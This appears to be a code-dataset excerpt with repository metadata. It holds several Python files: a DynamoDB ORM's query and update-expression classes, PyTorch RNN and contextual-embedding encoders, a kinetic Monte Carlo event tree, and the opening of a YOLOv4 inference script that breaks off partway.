return super().__getattr__(name)
except AttributeError:
return type(self)(attribute_name=f"{self._awstin_name}.{name}")
def __getitem__(self, index):
"""
Support for nested container queries
"""
return type(self)(attribute_name=f"{self._awstin_name}[{index}]")
# --- Query and scan filter expressions ---
def begins_with(self, value):
"""
Filter results by a key or attribute beginning with a value
Parameters
----------
value : str
Starting string for returned results
"""
return self._query_type(self._awstin_name).begins_with(to_decimal(value))
def between(self, low, high):
"""
Filter results by range (inclusive)
Parameters
----------
low : Any
Low end of the range
high : Any
High end of the range
"""
return self._query_type(self._awstin_name).between(
to_decimal(low),
to_decimal(high),
)
def __eq__(self, value):
return self._query_type(self._awstin_name).eq(to_decimal(value))
def __gt__(self, value):
return self._query_type(self._awstin_name).gt(to_decimal(value))
def __ge__(self, value):
return self._query_type(self._awstin_name).gte(to_decimal(value))
def __lt__(self, value):
return self._query_type(self._awstin_name).lt(to_decimal(value))
def __le__(self, value):
return self._query_type(self._awstin_name).lte(to_decimal(value))
def attribute_type(self, value):
"""
Filter results by attribute type
Parameters
----------
value : str
Index for a DynamoDB attribute type (e.g. "N" for Number)
"""
return BotoAttr(self._awstin_name).attribute_type(to_decimal(value))
def contains(self, value):
"""
Filter results by attributes that are containers and contain the target
value
Parameters
----------
values : Any
Result must contain this item
"""
return BotoAttr(self._awstin_name).contains(to_decimal(value))
def exists(self):
"""
Filter results by existence of an attribute
"""
return BotoAttr(self._awstin_name).exists()
def in_(self, values):
"""
Filter results by existence in a set
Parameters
----------
values : list of Any
Allowed values of returned results
"""
in_values = [to_decimal(value) for value in values]
return BotoAttr(self._awstin_name).is_in(in_values)
def __ne__(self, value):
return BotoAttr(self._awstin_name).ne(to_decimal(value))
def not_exists(self):
"""
Filter results by non-existence of an attribute
"""
return BotoAttr(self._awstin_name).not_exists()
def size(self):
"""
Filter by size of a collection
"""
return Size(self._awstin_name)
# --- Update expressions ---
def set(self, expression):
"""
Set an attribute to a new value.
Corresponds to SET as part of the update expression in
``Table.update_item``.
Parameters
----------
expression : UpdateOperand
New value, or an expression defining a new value
"""
return SetOperator(self, UpdateOperand(expression))
def remove(self):
"""
Remove an attribute.
Corresponds to REMOVE as part of the update expression in
``Table.update_item``.
"""
return RemoveOperator(self)
def add(self, expression):
"""
Add to an attribute (numerical add or addition to a set).
Corresponds to ADD as part of the update expression in
``Table.update_item``.
Parameters
----------
expression : UpdateOperand
Value to add
"""
return AddOperator(self, UpdateOperand(expression))
def delete(self, expression):
"""
Delete part of a set attribute.
Corresponds to DELETE as part of the update expression in
``Table.update_item``.
Parameters
----------
expression : UpdateOperand
Value to delete
"""
return DeleteOperator(self, UpdateOperand(expression))
def __add__(self, other):
return CombineOperand(UpdateOperand(self), UpdateOperand(other), "+")
def __sub__(self, other):
return CombineOperand(UpdateOperand(self), UpdateOperand(other), "-")
def __radd__(self, other):
return CombineOperand(UpdateOperand(other), UpdateOperand(self), "+")
def __rsub__(self, other):
return CombineOperand(UpdateOperand(other), UpdateOperand(self), "-")
def if_not_exists(self, value):
"""
Conditionally return a value if this attribute doesn't exist on the
model
"""
return IfNotExistsOperand(UpdateOperand(self), UpdateOperand(value))
class Key(BaseAttribute):
"""
Used to define and query hash and sort key attributes on a dynamodb table
data model
"""
_query_type = BotoKey
class Attr(BaseAttribute):
"""
Used to define and query non-key attributes on a dynamodb table data model
"""
_query_type = BotoAttr
def size_query(self, *args, **kwargs):
return BotoAttr(self._awstin_name).size()
class Size(BaseAttribute):
_query_type = size_query
class DynamoModelMeta(type):
def __getattribute__(self, name):
attr = super().__getattribute__(name)
if isinstance(attr, BaseAttribute):
attr._name_on_model = name
return attr
else:
return attr
def _dynamodb_attributes(self):
result = {
getattr(self, attr)._awstin_name: attr
for attr in dir(self)
if isinstance(getattr(self, attr), BaseAttribute)
}
return result
def _get_kwargs(self):
"""
Kwargs that should be passed to query, scan, get_item
"""
return {
**self._dynamo_projection(),
**self._index_kwargs(),
}
def _dynamo_projection(self):
"""
Attributes to request when retrieving data from DynamoDB
Returns
-------
dict
kwargs to be passed to DynamoDB get attribute calls to employ
a projection expression and placeholders
"""
placeholders = {
"#" + str(uuid.uuid4())[:8]: value
for value in self._dynamodb_attributes().keys()
}
expression = ", ".join(placeholders.keys())
return dict(
ProjectionExpression=expression,
ExpressionAttributeNames=placeholders,
)
def _index_kwargs(self):
if hasattr(self, "_index_name_"):
return dict(
IndexName=self._index_name_,
)
else:
return {}
class DynamoModel(metaclass=DynamoModelMeta):
"""
Class defining an ORM model for a DynamoDB table.
Subclasses must have a ``_table_name_`` attribute. Attributes making up
the data model should be Attr or Key instances.
Subclasses representing indexes should also have an ``_index_name_``
attribute
"""
def __init__(self, **kwargs):
"""
Parameters
----------
**kwargs : dict of (str, Any)
Initialization of Attr and Key attributes.
"""
model_attrs = type(self)._dynamodb_attributes().values()
for name in model_attrs:
setattr(self, name, NOT_SET)
for name, value in kwargs.items():
if name not in model_attrs:
msg = f"{type(self)!r} has no attribute {name!r}"
raise AttributeError(msg)
setattr(self, name, value)
@classmethod
def deserialize(cls, data):
"""
Deserialize JSON into a DynamoModel subclass. Internally converts
Decimal to float in the deserialization.
Parameters
----------
data : dict of (str, Any)
Serialized model
Returns
-------
DynamoModel
The deserialized data model
"""
model_attrs = cls._dynamodb_attributes()
result = cls()
for attr in model_attrs.values():
setattr(result, attr, NOT_SET)
for db_attr, value in data.items():
if db_attr in model_attrs.keys():
if type(value) in [list, set, tuple]:
value = type(value)(from_decimal(v) for v in value)
elif type(value) is dict:
value = {from_decimal(k): from_decimal(v) for k, v in value.items()}
else:
value = from_decimal(value)
setattr(result, model_attrs[db_attr], value)
return result
def serialize(self):
"""
Serialize a DynamoModel subclass to JSON that can be inserted into
DynamoDB. Internally converts float to Decimal.
Returns
-------
dict of (str, Any)
The serialized JSON entry
"""
model_attrs = type(self)._dynamodb_attributes()
result = {}
for dynamo_name, model_name in model_attrs.items():
value = getattr(self, model_name)
if value is not NOT_SET:
if type(value) in [list, set, tuple]:
value = type(value)(to_decimal(v) for v in value)
elif type(value) is dict:
value = {to_decimal(k): to_decimal(v) for k, v in value.items()}
else:
value = to_decimal(value)
result[dynamo_name] = value
return result
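# Illustrative sketch (table and attribute names are assumptions): a minimal
# model and a serialize/deserialize round trip.
#
#     class User(DynamoModel):
#         _table_name_ = "users"
#         user_id = Key()
#         balance = Attr()
#
#     item = User(user_id="u1", balance=3.5)
#     entry = item.serialize()        # floats become Decimal for DynamoDB
#     restored = User.deserialize(entry)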
# ---- Update Operators
class UpdateOperator(ABC):
"""
A representation of an UpdateItem expression
"""
def __and__(self, other):
"""
Combine two update expressions
"""
return CombineOperator(self, other)
@abstractmethod
def update_dict(self):
pass
@staticmethod
def update_expression(update_dict):
expressions = []
for operation in "SET", "ADD", "DELETE", "REMOVE":
if update_dict.get(operation):
expressions.append(operation + " " + ", ".join(update_dict[operation]))
return " ".join(expressions)
def serialize(self):
"""
Produce kwargs to be passed to DynamoDB Table.update_item.
Keys and values are:
"UpdateExpression": string representing the update expression
"ExpressionAttributeNames": Placeholder map for attribute names
"ExpressionAttributeValues": Placeholder map for attribute values
Returns
-------
dict
Kwargs for update_item
"""
update_dict = self.update_dict()
result = {
"UpdateExpression": self.update_expression(update_dict),
}
if update_dict["ExpressionAttributeNames"]:
result["ExpressionAttributeNames"] = update_dict["ExpressionAttributeNames"]
if update_dict["ExpressionAttributeValues"]:
result["ExpressionAttributeValues"] = update_dict[
"ExpressionAttributeValues"
]
return result
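# Illustrative composition sketch (attribute names are assumptions; placeholder
# ids are random per call):
#
#     update = MyModel.count.set(MyModel.count + 1) & MyModel.legacy.remove()
#     table.update_item(Key={...}, **update.serialize())
#
# yielding kwargs whose UpdateExpression reads roughly
# "SET #xxxxxxxx = #yyyyyyyy + :zzzzzzzz REMOVE #wwwwwwww", with both
# placeholder maps pointing back to the real names and values.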
class CombineOperator(UpdateOperator):
"""
Combine two update expressions
"""
def __init__(self, left, right):
self.left = left
self.right = right
def update_dict(self):
result = defaultdict(list)
ser_left = self.left.update_dict()
ser_right = self.right.update_dict()
items = list(ser_left.items()) + list(ser_right.items())
for key, values in items:
if key in ["SET", "ADD", "DELETE", "REMOVE"]:
result[key].extend(values)
result["ExpressionAttributeNames"] = dict(
**ser_left["ExpressionAttributeNames"],
**ser_right["ExpressionAttributeNames"],
)
result["ExpressionAttributeValues"] = dict(
**ser_left["ExpressionAttributeValues"],
**ser_right["ExpressionAttributeValues"],
)
return result
class SetOperator(UpdateOperator):
"""
Support for SET
"""
def __init__(self, attr, operand):
self.attr = attr
self.operand = operand
def update_dict(self):
serialized_attr = itemize_attr(self.attr)
serialized_operand = self.operand.serialize()
attribute_names = dict(
**serialized_operand["ExpressionAttributeNames"],
**serialized_attr["ExpressionAttributeNames"],
)
return {
"SET": [
f"{serialized_attr['UpdateExpression']} = "
+ serialized_operand["UpdateExpression"]
],
"ExpressionAttributeNames": attribute_names,
"ExpressionAttributeValues": serialized_operand[
"ExpressionAttributeValues"
],
}
class AddOperator(UpdateOperator):
def __init__(self, attr, operand):
self.attr = attr
self.operand = operand
def update_dict(self):
serialized_attr = itemize_attr(self.attr)
serialized_operand = self.operand.serialize()
attribute_names = dict(
**serialized_operand["ExpressionAttributeNames"],
**serialized_attr["ExpressionAttributeNames"],
)
return {
"ADD": [
f"{serialized_attr['UpdateExpression']} "
+ serialized_operand["UpdateExpression"]
],
"ExpressionAttributeNames": attribute_names,
"ExpressionAttributeValues": serialized_operand[
"ExpressionAttributeValues"
],
}
class RemoveOperator(UpdateOperator):
def __init__(self, attr):
self.attr = attr
def update_dict(self):
serialized_attr = itemize_attr(self.attr)
return {
"REMOVE": [serialized_attr["UpdateExpression"]],
"ExpressionAttributeNames": serialized_attr["ExpressionAttributeNames"],
"ExpressionAttributeValues": {},
}
class DeleteOperator(UpdateOperator):
def __init__(self, attr, operand):
self.attr = attr
self.operand = operand
def update_dict(self):
serialized_attr = itemize_attr(self.attr)
serialized_operand = self.operand.serialize()
attribute_names = dict(
**serialized_operand["ExpressionAttributeNames"],
**serialized_attr["ExpressionAttributeNames"],
)
return {
"DELETE": [
f"{serialized_attr['UpdateExpression']} "
+ serialized_operand["UpdateExpression"]
],
"ExpressionAttributeNames": attribute_names,
"ExpressionAttributeValues": serialized_operand[
"ExpressionAttributeValues"
],
}
# ---- Update Operands
def serialize_operand(value):
name = str(uuid.uuid4())[:8]
if isinstance(value, UpdateOperand):
return value.serialize()
elif isinstance(value, BaseAttribute):
return itemize_attr(value)
elif type(value) in [list, set, tuple]:
name = ":" + name
value = type(value)([to_decimal(v) for v in value])
return {
"UpdateExpression": name,
"ExpressionAttributeNames": {},
"ExpressionAttributeValues": {name: value},
}
else:
name = ":" + name
return {
"UpdateExpression": name,
"ExpressionAttributeNames": {},
"ExpressionAttributeValues": {name: to_decimal(value)},
}
def itemize_attr(attr):
# Separate indexes
parts = []
current_section = ""
for letter in attr._awstin_name:
if letter == "[":
parts.append(current_section)
current_section = "["
elif letter == "]":
parts.append(current_section + "]")
current_section = ""
else:
current_section += letter
if current_section:
parts.append(current_section)
serialized = ""
name_map = {}
# Separate attributes
for part in parts:
if "[" in part and "]" in part:
serialized += part
else:
if part.startswith("."):
serialized += "."
part = part[1:]
sections = part.split(".")
serialized_sections = []
for section in sections:
name = "#" + str(uuid.uuid4())[:8]
name_map[name] = section
serialized_sections.append(name)
serialized += ".".join(serialized_sections)
result = {
"UpdateExpression": serialized,
"ExpressionAttributeNames": name_map,
"ExpressionAttributeValues": {},
}
return result
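# For example, an awstin name like "parent.child[2]" is split into a dotted part
# and an index part; each dotted section gets a "#<8-hex-uuid>" placeholder, so
# the returned UpdateExpression looks like "#aaaaaaaa.#bbbbbbbb[2]" with
# ExpressionAttributeNames mapping the placeholders back to "parent" and "child".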
class UpdateOperand:
"""
Inner part of an update expression
"""
def __init__(self, value):
self.value = value
def serialize(self):
return serialize_operand(self.value)
class CombineOperand(UpdateOperand):
"""
Add or subtract two expressions
"""
def __init__(self, left, right, symbol):
self.left = left
self.right = right
self.symbol = symbol
def serialize(self):
ser_left = serialize_operand(self.left)
ser_right = serialize_operand(self.right)
expression = (
f"{ser_left['UpdateExpression']} "
f"{self.symbol} "
f"{ser_right['UpdateExpression']}"
)
return {
"UpdateExpression": expression,
"ExpressionAttributeNames": dict(
**ser_left["ExpressionAttributeNames"],
**ser_right["ExpressionAttributeNames"],
),
"ExpressionAttributeValues": dict(
**ser_left["ExpressionAttributeValues"],
**ser_right["ExpressionAttributeValues"],
),
}
class IfNotExistsOperand(UpdateOperand):
"""
Set a value if the given attribute does not exist
"""
def __init__(self, attr, value):
self.attr = attr
self.value = value
def serialize(self):
ser_attr = serialize_operand(self.attr)
ser_value = serialize_operand(self.value)
expression = (
f"if_not_exists({ser_attr['UpdateExpression']}, "
f"{ser_value['UpdateExpression']})"
)
return {
"UpdateExpression": expression,
"ExpressionAttributeNames": dict(
**ser_attr["ExpressionAttributeNames"],
**ser_value["ExpressionAttributeNames"],
),
"ExpressionAttributeValues": dict(
**ser_attr["ExpressionAttributeValues"],
**ser_value["ExpressionAttributeValues"],
),
}
class ListAppendOperand(UpdateOperand):
"""
Combine two lists
"""
def __init__(self, left, right):
self.left = left
self.right = right
def serialize(self):
ser_left = serialize_operand(self.left)
ser_right = serialize_operand(self.right)
expression = (
f"list_append({ser_left['UpdateExpression']}, "
f"{ser_right['UpdateExpression']})"
)
return {
"UpdateExpression": expression,
"ExpressionAttributeNames": dict(
**ser_left["ExpressionAttributeNames"],
**ser_right["ExpressionAttributeNames"],
),
"ExpressionAttributeValues": dict(
**ser_left["ExpressionAttributeValues"],
**ser_right["ExpressionAttributeValues"],
),
}
def list_append(left, right):
"""
Set a value to the combination of two lists in an update expression
"""
return ListAppendOperand(UpdateOperand(left), UpdateOperand(right))
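# Illustrative sketch (attribute name is an assumption):
#
#     update = MyModel.tags.set(list_append(MyModel.tags, ["new-tag"]))
#     table.update_item(Key={...}, **update.serialize())
#
# which appends to the existing list attribute via DynamoDB's list_append.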
| 27.912987
| 88
| 0.579258
| 2,062
| 21,493
| 5.840446
| 0.126576
| 0.014946
| 0.019763
| 0.014116
| 0.39824
| 0.358299
| 0.316865
| 0.297351
| 0.28199
| 0.22702
| 0
| 0.000616
| 0.320476
| 21,493
| 769
| 89
| 27.949285
| 0.823964
| 0.18085
| 0
| 0.367788
| 0
| 0
| 0.127362
| 0.104586
| 0
| 0
| 0
| 0
| 0
| 1
| 0.151442
| false
| 0.002404
| 0.016827
| 0.033654
| 0.355769
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5b22ea34f0bbc299fab73839184251258eecd69
| 310
|
py
|
Python
|
Losses/__init__.py
|
SimonTheVillain/ActiveStereoNet
|
708bddce844998b366be1a1ec8a72a31ccd26f8c
|
[
"MIT"
] | 17
|
2019-08-23T04:00:32.000Z
|
2022-02-06T13:37:02.000Z
|
Losses/__init__.py
|
SimonTheVillain/ActiveStereoNet
|
708bddce844998b366be1a1ec8a72a31ccd26f8c
|
[
"MIT"
] | null | null | null |
Losses/__init__.py
|
SimonTheVillain/ActiveStereoNet
|
708bddce844998b366be1a1ec8a72a31ccd26f8c
|
[
"MIT"
] | 7
|
2019-12-20T07:46:41.000Z
|
2021-11-01T04:18:19.000Z
|
from .supervise import *
def get_losses(name, **kwargs):
name = name.lower()
if name == 'rhloss':
loss = RHLoss(**kwargs)
elif name == 'xtloss':
loss = XTLoss(**kwargs)
else:
raise NotImplementedError('Loss [{:s}] is not supported.'.format(name))
return loss
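# Minimal usage sketch (constructor kwargs depend on the loss definitions in
# .supervise, so they are omitted here):
#
#     criterion = get_losses('rhloss')
#     # loss = criterion(prediction, target)   # typical loss-call pattern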
| 22.142857
| 79
| 0.580645
| 35
| 310
| 5.114286
| 0.657143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.270968
| 310
| 13
| 80
| 23.846154
| 0.792035
| 0
| 0
| 0
| 0
| 0
| 0.132258
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.1
| false
| 0
| 0.1
| 0
| 0.3
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5b25fcda4db3927e0504a3caa222468f8e2eb7c
| 6,766
|
py
|
Python
|
model/src/recurrent.py
|
qkaren/converse_reading_cmr
|
d06d981be12930cff8458e2b1b81be4f5df3a329
|
[
"MIT"
] | 87
|
2019-06-07T18:16:30.000Z
|
2021-11-27T08:18:45.000Z
|
model/src/recurrent.py
|
qkaren/converse_reading_cmr
|
d06d981be12930cff8458e2b1b81be4f5df3a329
|
[
"MIT"
] | 11
|
2019-06-19T20:53:27.000Z
|
2021-05-07T01:05:01.000Z
|
model/src/recurrent.py
|
qkaren/converse_reading_cmr
|
d06d981be12930cff8458e2b1b81be4f5df3a329
|
[
"MIT"
] | 17
|
2019-06-08T01:50:23.000Z
|
2022-02-16T07:12:15.000Z
|
import torch
import torch.nn as nn
from torch.nn.parameter import Parameter
from torch.nn.utils.rnn import pad_packed_sequence as unpack
from torch.nn.utils.rnn import pack_padded_sequence as pack
from .my_optim import weight_norm as WN
# TODO: use system func to bind ~
RNN_MAP = {'lstm': nn.LSTM, 'gru': nn.GRU, 'rnn': nn.RNN}
class OneLayerBRNN(nn.Module):
def __init__(self, input_size, hidden_size, prefix='stack_rnn', opt={}, dropout=None):
super(OneLayerBRNN, self).__init__()
self.opt = opt
self.prefix = prefix
self.cell_type = self.opt.get('{}_cell'.format(self.prefix), 'lstm')
self.emb_dim = self.opt.get('{}_embd_dim'.format(self.prefix), 0)
self.maxout_on = self.opt.get('{}_maxout_on'.format(self.prefix), False)
self.weight_norm_on = self.opt.get('{}_weight_norm_on'.format(self.prefix), False)
self.dropout = dropout
self.output_size = hidden_size if self.maxout_on else hidden_size * 2
self.hidden_size = hidden_size
self.rnn = RNN_MAP[self.cell_type](input_size, hidden_size, num_layers=1, bidirectional=True)
def forward(self, x, x_mask):
x = x.transpose(0, 1)
size = list(x.size())
rnn_output, h = self.rnn(x)
if self.maxout_on:
rnn_output = rnn_output.view(size[0], size[1], self.hidden_size, 2).max(-1)[0]
# Transpose back
hiddens = rnn_output.transpose(0, 1)
return hiddens
class BRNNEncoder(nn.Module):
def __init__(self, input_size, hidden_size, prefix='rnn', opt={}, dropout=None):
super(BRNNEncoder, self).__init__()
self.opt = opt
self.prefix = prefix
self.dropout = dropout
self.cell_type = opt.get('{}_cell'.format(self.prefix), 'gru')
self.weight_norm_on = opt.get('{}_weight_norm_on'.format(self.prefix), False)
self.top_layer_only = opt.get('{}_top_layer_only'.format(self.prefix), False)
self.num_layers = opt.get('{}_num_layers'.format(self.prefix), 1)
self.rnn = RNN_MAP[self.cell_type](input_size, hidden_size, self.num_layers, bidirectional=True)
if self.weight_norm_on:
self.rnn = WN(self.rnn)
if self.top_layer_only:
self.output_size = hidden_size * 2
else:
self.output_size = self.num_layers * hidden_size * 2
def forward(self, x, x_mask):
x = self.dropout(x)
_, h = self.rnn(x.transpose(0, 1).contiguous())
if self.cell_type == 'lstm':
h = h[0]
shape = h.size()
h = h.view(self.num_layers, 2, shape[1], shape[2]).transpose(1, 2).contiguous()
h = h.view(self.num_layers, shape[1], 2 * shape[2])
if self.top_layer_only:
return h[-1]
else:
return h.transpose(0, 1).contiguous().view(x.size(0), -1)
#------------------------------
# Contextual embedding
# TODO: remove packing to speed up
# Credit from: https://github.com/salesforce/cove
#------------------------------
class ContextualEmbedV2(nn.Module):
def __init__(self, model_path, padding_idx=0):
super(ContextualEmbedV2, self).__init__()
state_dict = torch.load(model_path)
self.rnn1 = nn.LSTM(300, 300, num_layers=1, bidirectional=True)
self.rnn2 = nn.LSTM(600, 300, num_layers=1, bidirectional=True)
state_dict1 = dict([(name, param.data) if isinstance(param, Parameter) else (name, param)
for name, param in state_dict.items() if '0' in name])
state_dict2 = dict([(name.replace('1', '0'), param.data) if isinstance(param, Parameter) else (name.replace('1', '0'), param)
for name, param in state_dict.items() if '1' in name])
self.rnn1.load_state_dict(state_dict1)
self.rnn2.load_state_dict(state_dict2)
for p in self.parameters(): p.requires_grad = False
self.output_size = 600
def setup_eval_embed(self, eval_embed, padding_idx=0):
pass
def forward(self, x, x_mask):
"""A pretrained MT-LSTM (McCann et. al. 2017).
"""
lengths = x_mask.data.eq(0).long().sum(1).squeeze()
lens, indices = torch.sort(lengths, 0, True)
output1, _ = self.rnn1(pack(x[indices], lens.tolist(), batch_first=True))
output2, _ = self.rnn2(output1)
output1 = unpack(output1, batch_first=True)[0]
output2 = unpack(output2, batch_first=True)[0]
_, _indices = torch.sort(indices, 0)
output1 = output1[_indices]
output2 = output2[_indices]
return output1, output2
class ContextualEmbed(nn.Module):
def __init__(self, path, vocab_size, emb_dim=300, embedding=None, padding_idx=0):
super(ContextualEmbed, self).__init__()
self.embedding = nn.Embedding(vocab_size, emb_dim, padding_idx=padding_idx)
if embedding is not None:
self.embedding.weight.data = embedding
state_dict = torch.load(path)
self.rnn1 = nn.LSTM(300, 300, num_layers=1, bidirectional=True)
self.rnn2 = nn.LSTM(600, 300, num_layers=1, bidirectional=True)
state_dict1 = dict([(name, param.data) if isinstance(param, Parameter) else (name, param)
for name, param in state_dict.items() if '0' in name])
state_dict2 = dict([(name.replace('1', '0'), param.data) if isinstance(param, Parameter) else (name.replace('1', '0'), param)
for name, param in state_dict.items() if '1' in name])
self.rnn1.load_state_dict(state_dict1)
self.rnn2.load_state_dict(state_dict2)
for p in self.parameters(): p.requires_grad = False
self.output_size = 600
def setup_eval_embed(self, eval_embed, padding_idx=0):
self.eval_embed = nn.Embedding(eval_embed.size(0), eval_embed.size(1), padding_idx = padding_idx)
self.eval_embed.weight.data = eval_embed
for p in self.eval_embed.parameters():
p.requires_grad = False
def forward(self, x_idx, x_mask):
emb = self.embedding if self.training else self.eval_embed
x_hiddens = emb(x_idx)
lengths = x_mask.data.eq(0).long().sum(1)
lens, indices = torch.sort(lengths, 0, True)
output1, _ = self.rnn1(pack(x_hiddens[indices], lens.tolist(), batch_first=True))
output2, _ = self.rnn2(output1)
output1 = unpack(output1, batch_first=True)[0]
output2 = unpack(output2, batch_first=True)[0]
_, _indices = torch.sort(indices, 0)
output1 = output1[_indices]
output2 = output2[_indices]
return output1, output2
| 45.716216
| 134
| 0.619125
| 927
| 6,766
| 4.307443
| 0.160734
| 0.027548
| 0.032056
| 0.0288
| 0.593539
| 0.522915
| 0.465064
| 0.454545
| 0.454545
| 0.441022
| 0
| 0.03
| 0.246231
| 6,766
| 147
| 135
| 46.027211
| 0.752941
| 0.038723
| 0
| 0.420168
| 0
| 0
| 0.023014
| 0
| 0
| 0
| 0
| 0.006803
| 0
| 1
| 0.084034
| false
| 0.008403
| 0.05042
| 0
| 0.210084
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5b27d5f6e6878759cb3ab473c4702b3507a5b67
| 2,810
|
py
|
Python
|
kmcsim/sim/events_old.py
|
vlcekl/kmcpy
|
b55a23f64d4b6d2871671f4a16346cc897c4a2a5
|
[
"MIT"
] | null | null | null |
kmcsim/sim/events_old.py
|
vlcekl/kmcpy
|
b55a23f64d4b6d2871671f4a16346cc897c4a2a5
|
[
"MIT"
] | null | null | null |
kmcsim/sim/events_old.py
|
vlcekl/kmcpy
|
b55a23f64d4b6d2871671f4a16346cc897c4a2a5
|
[
"MIT"
] | null | null | null |
#!//anaconda/envs/py36/bin/python
#
# File name: kmc_pld.py
# Date: 2018/08/03 09:07
# Author: Lukas Vlcek
#
# Description:
#
import numpy as np
from collections import Counter
class EventTree:
"""
Class maintaining a binary tree for random event type lookup
and arrays for choosing specific event.
"""
def __init__(self, rates, events):
self.rates = rates
self.events = events
self.__setup()
def __build_tree(self, e_ratio):
self.event_tree = []
# create event ratio array level 0 - bottom
if len(e_ratio) % 2 == 1:
e_ratio.extend([0.0])
# create the bottom level (rates*numbers)
self.event_tree.append(np.array(e_ratio))
# create partial summs (iteratively) up to the 2nd highest level
while len(e_ratio) > 2:
e_ratio = [e_ratio[i]+e_ratio[i+1] for i in range(0, len(e_ratio), 2)]
if len(e_ratio) % 2 == 1:
e_ratio.extend([0.0])
self.event_tree.append(np.array(e_ratio))
# create top level = sum of all rates
self.event_tree.append(np.array(sum(e_ratio)))
def __setup(self):
# Get dictionary of event type counts
e_counts = Counter([e['type'] for e in self.events])
print(e_counts)
# create a list of events based on event types
self.event_counts = [[] for _ in range(len(self.rates))]
for e in self.events:
self.event_counts[e['type']].append(e)
e_ratio = [e_counts.get(t, 0)*r for t, r in enumerate(self.rates)]
print('e_ratio', e_ratio)
self.__build_tree(e_ratio)
def update_events(self, old_events, new_events):
"""
Update tree: remove old events and add new events
"""
pass
def find_event(self):
"""Find and return an event"""
# generate a random number [0, R_total), where R_total is the tree root (sum of all rates)
q = self.event_tree[-1] * np.random.random()
# cycle through levels (top->down)
# start with top-level child (k-2) end with level above bottom (1)
j = 0
for k in range(len(self.event_tree)-2, 0, -1):
# left child value
left = self.event_tree[k][j]
if q < left:
j = 2*j
else:
q -= left
j = 2*j + 1
# bottom level - select the event type index
if q < self.event_tree[0][j]:
event_type = j
else:
event_type = j + 1
# select a random event index of a given type
event_number = np.random.randint(len(self.event_counts[event_type]))
# get the event object
event = self.event_counts[event_type][event_number]
return event
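# Minimal construction sketch (rates are indexed by event type; each event is a
# dict carrying a 'type' key, matching __setup above):
#
#     rates = [1.0, 0.5]
#     events = [{'type': 0}, {'type': 0}, {'type': 1}]
#     tree = EventTree(rates, events)
#     # event = tree.find_event()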
| 26.509434
| 82
| 0.56548
| 395
| 2,810
| 3.878481
| 0.311392
| 0.06658
| 0.059399
| 0.02611
| 0.159269
| 0.101828
| 0.084856
| 0.084856
| 0.084856
| 0.035248
| 0
| 0.021751
| 0.329181
| 2,810
| 105
| 83
| 26.761905
| 0.790981
| 0.291459
| 0
| 0.173913
| 0
| 0
| 0.007837
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.108696
| false
| 0.021739
| 0.043478
| 0
| 0.195652
| 0.043478
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5b2a5e3c1f4caec8e1b4e760aef349c24f989cf
| 7,293
|
py
|
Python
|
scripts/my_inference.py
|
Mr-TalhaIlyas/Scaled-YOLOv4
|
2b0326a6bc1eba386eb1a78b56727dcf29c77bac
|
[
"MIT"
] | null | null | null |
scripts/my_inference.py
|
Mr-TalhaIlyas/Scaled-YOLOv4
|
2b0326a6bc1eba386eb1a78b56727dcf29c77bac
|
[
"MIT"
] | null | null | null |
scripts/my_inference.py
|
Mr-TalhaIlyas/Scaled-YOLOv4
|
2b0326a6bc1eba386eb1a78b56727dcf29c77bac
|
[
"MIT"
] | null | null | null |
import os
os.environ['CUDA_VISIBLE_DEVICES'] = '2'
import torch
torch.rand(10)
import torch.nn as nn
import torch.nn.functional as F
import glob
from tqdm import tqdm, trange
print(torch.cuda.is_available())
print(torch.cuda.get_device_name())
print(torch.cuda.current_device())
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
print('Using device:', device)
print()
#Additional Info when using cuda
if device.type == 'cuda':
print(torch.cuda.get_device_name(0))
print('Memory Usage:')
print('Allocated:', round(torch.cuda.memory_allocated(0)/1024**3,1), 'GB')
print('Cached: ', round(torch.cuda.memory_reserved(0)/1024**3,1), 'GB')
import torch.backends.cudnn as cudnn
import numpy as np
import os, cv2
from tqdm import tqdm, trange
import seaborn as sns
from models.experimental import attempt_load
from utils.datasets import LoadStreams, LoadImages
from utils.general import (
check_img_size, non_max_suppression, apply_classifier, scale_coords, xyxy2xywh, plot_one_box, strip_optimizer)
from utils.torch_utils import select_device, load_classifier, time_synchronized
from my_utils import xyxy_2_xyxyo, draw_boxes
# Initialize
device = select_device('')
half = device.type != 'cpu' # half precision only supported on CUDA
def prepare_input(img1, img_size=416, half=True):
img2 = cv2.resize(img1, (img_size, img_size)) # W x H
img2 = img2.transpose(2,0,1)
img2 = img2[np.newaxis, ...]
img2 = torch.from_numpy(img2).to(device) # torch image is ch x H x W
img2 = img2.half() if half else img2.float()  # use FP16 only when half precision is enabled
img2 /= 255.0
return img2
#%%
# Directories
out = '/home/user01/data_ssd/Talha/yolo/op/'
weights = '/home/user01/data_ssd/Talha/yolo/ScaledYOLOv4/runs/exp2_yolov4-csp-results/weights/best_yolov4-csp-results.pt'
source = '/home/user01/data_ssd/Talha/yolo/paprika_y5/valid/images/'
imgsz = 416
conf_thres = 0.4
iou_thres = 0.5
classes = [0,1,2,3,4,5]
class_names = ["blossom_end_rot", "graymold","powdery_mildew","spider_mite",
